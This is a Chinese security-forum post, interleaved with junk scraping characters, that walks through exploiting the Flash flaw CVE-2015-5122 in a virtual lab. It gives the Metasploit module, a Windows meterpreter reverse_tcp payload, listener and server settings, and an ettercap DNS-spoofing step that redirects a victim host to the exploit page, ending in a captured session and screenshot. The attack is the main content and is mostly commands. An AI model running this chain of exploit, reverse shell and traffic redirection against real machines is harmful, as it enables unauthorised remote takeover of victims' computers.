找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1545|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

+ N/ `) D. V1 U# r9 {) W0 B 二、cve2015-5122漏洞实例演示虚拟机 0 i' }+ z- U, w- ~# v

, w1 t% i# ]3 D* Y

! x- g. W& |* r( L' l! n- Y! {* R   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 6 \& J7 n- @9 E" b7 q) D

9 F. p7 p! g" n2 C d

: x# M; Q0 c: Y( M) y1 M3 M search cve-2015-5122如图: ; Z- N# G' @- p( g& ` c& [2 a

! N- a7 {# A5 y5 |# i3 \4 V

* Y! i* s& n' k" G1 H   ( G. o7 j! A# _" Y) x, l% G

2 Z3 j2 O( o$ `, ]9 Q. J8 Y0 _+ G! a

. Y" X$ P1 y& w3 ^& h% B 下面我们敲如下命令: 3 q4 q+ h2 ~* m: W' p( s

5 P5 e: F# _6 f! ]* b- R

) U2 M* F% Q2 I! \; F+ Y, [/ p% @ use exploit/multi/browser/adobe_flash_opaque_background_uaf ) E6 ^+ r4 j, @& P! G! z8 I

& Q$ I$ k$ i" Z# l5 G

6 ]& y& R. t0 `9 `( @* x+ Z/ W& L set PAYLOAD windows/meterpreter/reverse_tcp ( R. P" I: U$ y3 h

$ v& [$ d9 ^ D; x

* N; Q U2 x" p3 ~- t set LHOST 192.168.0.109 / }& K+ Z: E2 {

/ P p* G/ D2 ?/ s% [

5 T8 z( E" T! C set URIPATH /                        /*根目录*/ & J2 w7 e7 \/ T+ O0 o6 F0 n

* {7 a3 A7 |7 }/ [( k% R

- {, r5 G+ G3 S3 q5 b) N8 T set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 1 V3 Z! A9 E( L# h( W0 j. M. g

4 e" G) N0 n* y+ v# S `1 y

. C/ P) n6 ^" Z4 E/ A) X2 L set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ) ^* z2 S: a7 V1 o2 x

M. X" C0 V9 G( i4 a" `- P! u! h

2 o; o) z g- Z0 P 然后show options如图: / j/ D' K; l1 G) P. [' b2 I

' {, \. a1 K( }1 Q6 I3 [

/ j" v- g. N$ B$ d# N% I# t/ t/ Z   7 ?6 @6 j+ Q' ^0 ^

- m: J) r8 n8 T$ f) G8 d+ Y

0 E; @+ U f( k. g 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
/ _* T2 B# r K
N+ x5 d, I( y+ D4 N

5 n* b; a- w4 o, l/ @7 ^& }

, r0 D; Y; ]1 P5 d 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 9 f* r2 a, r" G( e2 o

3 D0 \1 U e: W5 o( H+ R3 G

" ]& E. N: `1 G9 y$ A Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ) g! a/ [5 P3 E5 F7 A, I2 a% X! c3 O

9 v" v6 J. k/ A* f

& d, d, V+ `* a( `7 X# B# b   4 n9 ]/ g0 g2 U* H. z

% {. K# \5 V$ R. _

1 H5 }+ F) A7 c0 G 成功了,这时候我们断开ettercap,如图: 1 S2 ^. A; t7 N; p' L/ \

' c8 u5 \7 _' `2 z1 M- J3 X

: l7 a& \8 N% t   : D3 j8 Y* {$ d; t

4 u F1 q; l$ D6 S; Q6 I& F

( Q1 P# H: g& a9 }& C2 ^* P Screenshot如图: 0 ?- p0 j) J+ X1 {( x* V6 S

$ |3 j9 X) j: k# @% J

4 N; g; f( [; ?$ c7 G0 z/ q* Z   r A0 i8 O6 U# {7 r5 l

5 f |" n( u, }8 T8 Z8 ?' K: N

r+ [4 g9 Z1 F , L% G% i1 d/ U7 i

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表